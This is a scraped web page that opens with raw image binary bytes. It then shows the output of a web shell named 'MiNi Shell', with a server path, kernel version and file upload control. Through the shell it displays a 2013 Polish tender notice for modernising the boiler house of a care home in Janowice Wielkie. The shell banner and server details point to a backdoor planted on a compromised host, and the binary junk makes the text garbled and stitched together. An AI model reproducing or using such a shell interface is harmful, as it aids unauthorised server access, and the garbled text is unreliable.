JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130201/45334-N-2013.html

<p class="kh_header"><b>Janowice Wielkie: OGRANICZENIE EMISJI ZANIECZYSZCZEŃ POPRZEZ MODERNIZACJĘ KOTŁOWNI  W DOMU POMOCY SPOŁECZNEJ  W JANOWICACH WIELKICH
(PRZEBUDOWA ŹRÓDŁA CIEPŁA Z ZASTOSOWANIEM BIOMASY ORAZ BUDOWA SILOSÓW NA PELLET I PODZIEMNEJ INSTALACJI C.O. W DOMU POMOCY SPOŁECZNEJ W JANOWICACH WIELKICH)</b><br>
<b>Numer ogłoszenia: 45334 - 2013; data zamieszczenia: 01.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , ul. Chłopska 1, 58-520 Janowice Wielkie, woj. dolnośląskie, tel. 0-75 7515213, 7528118, faks 0-75 7528134.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> dpsjanowicewielkie</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka samorządu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OGRANICZENIE EMISJI ZANIECZYSZCZEŃ POPRZEZ MODERNIZACJĘ KOTŁOWNI  W DOMU POMOCY SPOŁECZNEJ  W JANOWICACH WIELKICH
(PRZEBUDOWA ŹRÓDŁA CIEPŁA Z ZASTOSOWANIEM BIOMASY ORAZ BUDOWA SILOSÓW NA PELLET I PODZIEMNEJ INSTALACJI C.O. W DOMU POMOCY SPOŁECZNEJ W JANOWICACH WIELKICH).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia  - w  kolejności  wykonywania robót -  zestawiono  poniżej.

Nadrzędnym  założeniem do opracowania harmonogramu robót budowlanych, przy wykonaniu tego  zadania, jest konieczność zapewnienia ciągłej dostawy ciepłej wody do obiektów. Dopuszcza się maksymalnie 24 godzinną przerwę w dostawie ciepłej wody.




Opis przedmiotu zamówienia:
- demontaż istniejącej kotłowni olejowej wraz z całym osprzętem i orurowaniem w tym dwa kotły centralnego ogrzewania, jeden kocioł parowy i instalacja kondensu),
UWAGA: W pierwszej kolejności  należy  zdemontować  kocioł parowy oraz jeden z kotłów wodnych. Zdemontowany kocioł wodny należy ustawić tymczasowo na przygotowanym miejscu - przy kominie, zamontować palnik olejowy z kotła parowego, podłączyć przewody spalinowe i wodne do wymiennika i uruchomić go, na czas prowadzenia robót - do podgrzewu c.w.u. Ze względu na zły stan techniczny istniejących wymienników, do podgrzewu c.w.u., należy  wykorzystać nowy, projektowany wymiennik. Należy  go  ustawić  na  przygotowanym  miejscu  tymczasowym, tak aby nie przeszkadzał w postępie prac i podłączyć do kotła i instalacji c.w.u. 
   
- montaż nowych dwóch kotłów na pellet wraz z całą instalacją
Kocioł wraz z palnikiem na pellet  stanowić  będzie  jednostkę pracującą w pełni automatycznie, z elektrycznym  układem  zapłonu, modulującą  moc,  typu  PID  dostosowującą  się do aktualnego zapotrzebowania na ciepło, z korekcją parametrów spalania za pomocą sondy lambda, autooczyszczaniem  komór  spalania  palnika (wyeliminowania niekorzystnych technicznie, nieekonomicznych i nieekologicznych efektów spalania w nieoptymalnych warunkach pracy  kotła).
Technologia ta ma umożliwiać  stosowanie pelletu niższej jakości - pelletu szlakującego się, bez obaw o zwiększoną częstotliwość prac konserwacyjnych i stan podzespołów  palnika.
Kocioł wraz z palnikiem na pellety powinien automatycznie, płynnie modulować moc w zakresie od 30 do 100%.
Kotły powinny być wyposażone w wentylator spalin sterowany przez układ płynnej regulacji wydajności w funkcji podciśnienia w komorze spalania oraz układ automatycznego odpopielania do zasobnika przykotłowego.
  
- kapitalny remont pomieszczenia kotłowni,

- podłączenie do sieci  budynku administracyjnego (nr  11) i budynku mieszkalno gospodarczego
  (nr 16),

- budowa dwóch nowych zbiorników (silosów) na zapasy pelletu,

- wywóz i utylizacja odpadów budowlanych,

- sprzedaż pozyskanego złomu z demontażu urządzeń i instalacji i rozliczenie się z  Zamawiającym. 

Całość zadania musi być zgodna z zakresem prac  zamieszczonym w dokumentacjach technicznych  (załączniki  nr  6, 7, 8 i 9 do  SIWZ)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.41.00.00-4, 45.44.21.00-8, 45.26.12.10-9, 45.26.23.00-4, 45.22.32.10-1, 45.33.00.00-9, 45.33.11.10-0, 45.23.21.40-5, 45.31.00.00-3, 45.23.14.00-9, 75.31.10.00-0, 42.41.73.00-5, 44.61.31.10-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium w wysokości 20.000,00 złotych. Słownie złotych: dwadzieścia tysięcy.
Wadium musi obejmować cały okres związania ofertą i może być wniesione w formach określonych w art. 45 ust 6 Ustawy Prawo Zamówień Publicznych.
2. Wadium wnoszone w formie pieniężnej należy wpłacić przelewem  na  rachunek  bankowy  zamawiającego w  Banku  Millennium  SA w  Jeleniej  Górze  nr  konta  63  1160  2202  0000  0001  6437  6549  najpóźniej  w  dniu  upływu  terminu  do  złożenia  ofert (liczy  się  data wpływu  wadium  na  konto  zamawiającego).  
3. Wadium wnoszone w formie poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczenia udzielanego przez podmioty, należy złożyć w formie oryginału w sekretariacie Domu Pomocy Społecznej ul. Chłopska 1, 58-520 Janowice Wielkie najpóźniej w dniu składania ofert tj.  25.02.2013 r do godz. 10.00).
Z treści dokumentu wadium wnoszonego w formie, o której mowa powyżej powinno wynikać:
- termin obowiązywania poręczenia lub gwarancji, który nie może być krótszy niż termin związania ofertą,
- bezwarunkowe i nieodwołalne zobowiązanie gwaranta lub poręczyciela do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach wymienionych w art. 46 ust. 4a i 5 ustawy Prawo Zamówień Publicznych na każde pisemne żądanie zgłoszone przez Zamawiającego,
4. W przypadku składania oferty wspólnej, z wadium wnoszonego w formie innej niż pieniężna musi wynikać, że zabezpiecza ono ofertę wnoszoną przez wykonawców składających ofertę wspólną.
5. Wadium musi być wniesione najpóźniej w terminie 25.02.2013 r do godz. 10.00
Wykonawca, który  nie  wniesie wadium na zasadach określonych w SIWZ zostanie wykluczony z postępowania. 
Wadium  zostanie  zwrócone  wszystkim  wykonawcom  niezwłocznie po  wyborze  oferty  najkorzystniejszej  lub  unieważnieniu  postępowania,  z  wyjątkiem  wykonawcy,  którego  oferta  zostanie  wybrana  jako  najkorzystniejsza. Wykonawcy, którego  oferta  zostanie  wybrana,  wadium zostanie  zwrócone  po  zawarciu  umowy w sprawie  zamówienia publicznego  po  wniesieniu  zabezpieczenia  należytego wykonania  umowy.
Wykonawcy,  który  wycofał  ofertę  przed  upływem  terminu  składania  ofert,  wadium  zostanie  zwrócone  niezwłocznie na jego  wniosek.
Zamawiający  zażąda  ponownego  wniesienia  wadium  przez  wykonawcę, któremu  zwrócono  wadium,  jeżeli  w  wyniku  rozstrzygnięcia  odwołania  jego  oferta  została  wybrana  jako  najkorzystniejsza.  W  takim  wypadku  wadium  należy  wpłacić w ciągu 2 dni od dnia zażądania  przez  Zamawiającego.
Wadium  zostanie  zatrzymane  jeżeli  wykonawca  w  odpowiedzi  na  wezwanie, nie  złożył  wymaganych dokumentów, oświadczeń  lub  pełnomocnictw,  chyba,  że  udowodni, że wynika  to  z  przyczyn  nieleżących  po  jego  stronie.
Zamawiający  zatrzyma  wadium  Wykonawcy,  którego  oferta  zostanie  wybrana,  jeśli:
a) wykonawca  odmówi  podpisania  umowy na  warunkach określonych  w  ofercie, 
b) nie  wniesie  wymaganego zabezpieczenia  należytego  wykonania  umowy,
c) zawarcie  umowy  stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków w postępowaniu na formularzu (załącznik nr 2a ) Zamawiający dokona oceny spełniania przez  Wykonawców warunków udziału w postępowaniu na podstawie  załączonych dokumentów  i oświadczeń,   zgodnie  z  formułą (spełnia - nie spełnia).  Z  treści  załączonych  do  oferty  dokumentów, o których mowa w Rozdziale VII  musi  jednoznacznie  wynikać,  że  w.w warunki  Wykonawca  spełnił.
Nie wykazanie spełnienia chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na potwierdzenie warunku posiadania wiedzy i doświadczenia oferent złoży wykaz robót budowlanych, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu (np. referencji) potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, zgodny z załącznikiem nr 3 do SIWZ. Dodatkowo, że wykonał co najmniej 2 zamówienia, których przedmiotem były roboty budowlane   w tym co najmniej jedna z nich  o wartości nie mniejszej niż  1.000.000,00 złotych brutto, oraz przedstawi dokumenty potwierdzające (np. referencje), że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Wykonanie co najmniej jednej z tych robót budowlanych   powinno polegać na budowie, przebudowie, rozbudowie lub modernizacji kotłowni z zastosowaniem kotłów na pellet o mocy nie mniejszej niż 300 kW  z zewnętrznymi silosami na pellet.Zamawiający dokona oceny spełniania przez  Wykonawców warunków udziału w postępowaniu na podstawie  załączonych dokumentów  i oświadczeń,   zgodnie  z  formułą (spełnia - nie spełnia).  Z  treści  załączonych  do  oferty  dokumentów, o których mowa w Rozdziale VII  musi  jednoznacznie  wynikać,  że  w.w warunki  Wykonawca  spełnił.
Nie wykazanie spełnienia chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na potwierdzenie warunku dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia , wykonawca wykaże, że dysponuje:
a)co najmniej jedną osobą posiadającą uprawnienia budowlane do pełnienia samodzielnej funkcji technicznej w budownictwie, tj. kierownika budowy o specjalności konstrukcyjno budowlanej bez ograniczeń. 
Kierownik budowy ma posiadać uprawnienia wynikające z § 24 pkt 2 Rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 r. w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych (Dz. U. z 2011 r. Nr 165 poz. 987).
b)co najmniej jedną osobą posiadającą uprawnienia wykonawcze elektryczne do pełnienia samodzielnych funkcji w budownictwie, tj. Kierownika robót w specjalności elektrycznej bez ograniczeń,
c)co najmniej jedną osobą posiadającą uprawnienia wykonawcze do pełnienia samodzielnych funkcji w budownictwie, tj. kierownika robót w specjalności sanitarnej bez ograniczeń;
d)kierownicy robót powinni posiadać ważne zaświadczenia kwalifikacyjne serii  D, w objętym budową zakresie, wynikające z Ustawy o gospodarce energetycznej.
W tym celu Wykonawca przedstawi wykaz tych osób oraz oświadczenie o ich uprawnieniach  według załącznika  nr 4 do SIWZ, 
oraz dołączy oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (Załącznik nr 10 do SIWZ).Zamawiający dokona oceny spełniania przez  Wykonawców warunków udziału w postępowaniu na podstawie  załączonych dokumentów  i oświadczeń,   zgodnie  z  formułą (spełnia - nie spełnia).  Z  treści  załączonych  do  oferty  dokumentów, o których mowa w Rozdziale VII  musi  jednoznacznie  wynikać,  że  w.w warunki  Wykonawca  spełnił.
Nie wykazanie spełnienia chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na potwierdzenie warunku dysponowania osobami zdolnymi do wykonania zamówienia , wykonawca wykaże, że dysponuje:
a)co najmniej jedną osobą posiadającą uprawnienia budowlane do pełnienia samodzielnej funkcji technicznej w budownictwie, tj. kierownika budowy o specjalności konstrukcyjno budowlanej bez ograniczeń. 
Kierownik budowy ma posiadać uprawnienia wynikające z § 24 pkt 2 Rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 r. w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych (Dz. U. z 2011 r. Nr 165 poz. 987).
b)co najmniej jedną osobą posiadającą uprawnienia wykonawcze elektryczne do pełnienia samodzielnych funkcji w budownictwie, tj. Kierownika robót w specjalności elektrycznej bez ograniczeń,
c)co najmniej jedną osobą posiadającą uprawnienia wykonawcze do pełnienia samodzielnych funkcji w budownictwie, tj. kierownika robót w specjalności sanitarnej bez ograniczeń;
- kierownicy robót powinni posiadać ważne zaświadczenia kwalifikacyjne serii  D, w objętym budową zakresie, wynikające z Ustawy o gospodarce energetycznej.
W tym celu Wykonawca przedstawi wykaz tych osób oraz oświadczenie o ich uprawnieniach  według załącznika  nr 4 do SIWZ, 
oraz dołączy oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (Załącznik nr 10 do SIWZ). Zamawiający dokona oceny spełniania przez  Wykonawców warunków udziału w postępowaniu na podstawie  załączonych dokumentów  i oświadczeń,   zgodnie  z  formułą (spełnia - nie spełnia).  Z  treści  załączonych  do  oferty  dokumentów, o których mowa w Rozdziale VII  musi  jednoznacznie  wynikać,  że  w.w  warunki  Wykonawca  spełnił.
Nie wykazanie spełnienia chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający zażąda od Wykonawcy przed podpisaniem umowy przedstawienia opłaconej  polisy, a w przypadku jej braku innego dokumentu, potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę nie mniejszą niż wartość brutto złożonej oferty. Jeżeli z polisy jednoznacznie nie wynika fakt jej opłacenia, Zamawiający uzna za wystarczające załączenie do polisy dowodu opłacenia polisy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - gwarancja na roboty budowlane - 5</li>
<li>3 - gwarancja na materiały użyte w realizacji zadania - 5</li>
<li>4 - gwarancja na urządzenia - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> dpsjanowicewielkie<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społęcznej
ul. Chłopska 1
58-520 Janowice Wielkie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2013 godzina 10:00, miejsce: Dom Pomocy Społęcznej
ul. Chłopska 1
58-520 Janowice Wielkie
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
